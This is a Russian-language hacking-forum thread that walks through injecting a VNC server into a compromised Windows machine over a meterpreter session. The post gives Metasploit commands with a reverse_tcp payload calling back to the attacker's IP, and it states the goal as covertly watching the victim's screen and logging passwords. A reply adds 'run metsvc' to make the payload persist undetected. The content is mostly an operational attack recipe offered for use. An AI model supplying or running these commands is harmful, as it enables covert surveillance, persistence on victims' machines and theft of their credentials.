ANTICHAT - Захват VNC сессии на удаленном компьютере.

ANTICHAT (https://forum.antichat.xyz/index.php)

- Этичный хакинг или пентестинг (https://forum.antichat.xyz/forumdisplay.php?f=209)

- - Захват VNC сессии на удаленном компьютере. (https://forum.antichat.xyz/showthread.php?t=557914)

Привет! Здесь пойдет речь о том как использовать VNC -сервер на удаленном компьютере. Что такое VNC и зачем он нам нужен? Немного теории:

Virtual Network Computing (VNC) — система удалённого доступа к рабочему столу компьютера, использующая протокол RFB (Remote FrameBuffer, удалённый кадровый буфер). Управление осуществляется путём передачи нажатий клавиш на клавиатуре и движений мыши с одного компьютера на другой и ретрансляции содержимого экрана через компьютерные сети.

Сразу оговорюсь, что запущенный через шелл meterpreter’a VNC – сервер, к сожалению не позволит нам управлять этим компьютером.

Вместо этого мы сможем наблюдать за действиями на мониторе жертвы, вовремя делать скриншоты экрана, собирая интересную информацию, параллельно включив кейлоггер, добывать пароли именно от интересующих нас аккаунтов и т.д.

Приступим, как обычно, перед началом всех манипуляций открываем сессию meterpreter с повышенными привилегиями,

https://forum.antichat.xyz/attachmen...87ba30ed96.png

(с базовыми получалось на Windows 7. Win 8.1 и 10 только с повышенными), и пишем по порядку, нижеследующее:

> use windows/manage/payload_inject

> set payload windows/vncinject/reverse_tcp

> set LHOST 192.168.0.18 (IP атакуещего)

> set session 2 (Номер вашей сессии с привилегиями)

> set handler true

> exploit

https://forum.antichat.xyz/attachmen...13933b8475.png

Убеждаемся, что все идет успешно:

https://forum.antichat.xyz/attachmen...83a9ae5239.png

В результате этих действий будет открыто окно VNC – сервера:

https://forum.antichat.xyz/attachmen...99bdb2c114.png

На этом все, вопросы и пожелания жду в комментариях.

збс, лес как у меня на обоях

Цитата:

IronBird сказал(а):

Так может это и твой стол?)

точно спалился

Цитата:

Алёша сказал(а):

кто нибудь знает как беспалевно вживить payload на постоянно?

Алексей, здравствуйте. Тема форума Этичный хакинг и тестирование на проникновение.

Цитата:

Алёша сказал(а):

кто нибудь знает как беспалевно вживить payload на постоянно?

В отрытой сессии пейлоада:

Цитата:

run metsvc

Пропишет нагрузку как сервис.
Справка:

Цитата:

OPTIONS:

-A Automatically start a matching multi/handler to connect to the service
-h This help menu
-r Uninstall an existing Meterpreter service (files must be deleted manually)

Цитата:

OmeN сказал(а):

я не понял .. куда вводить эти команды ? в терменал Кали ? ввожу use windows/manage/payload_inject - пишет bash: use: command not found . И как открыть сессию meterpreter с повышенными привилегиями ?

Это надо вводить в msf консоль
сначало msfconsole запускаем.

Вопрос нуба: ip атакующего это ip жертвы?(вряд ли) если нет, то какие данные жертвы? просто не понял, какая из команд отвечает за ввод данных жертвы?

Цитата:

DSW сказал(а):

set LHOSTip атакующего это твой ip например 192.168.1.100
ip жертвы это тот кого собираешься атаковать например 1.1.1.1

Какая команда указывает жертву?

Цитата:

DSW сказал(а):

Я тут молец ступил,полуается что set LHOST 192.168.0.18 это тот кого атакуем

Спс. Ip серый или белый?

Ну что я могу сказать . Статья стоит своего Хозяина , а хозяин статьи молодец )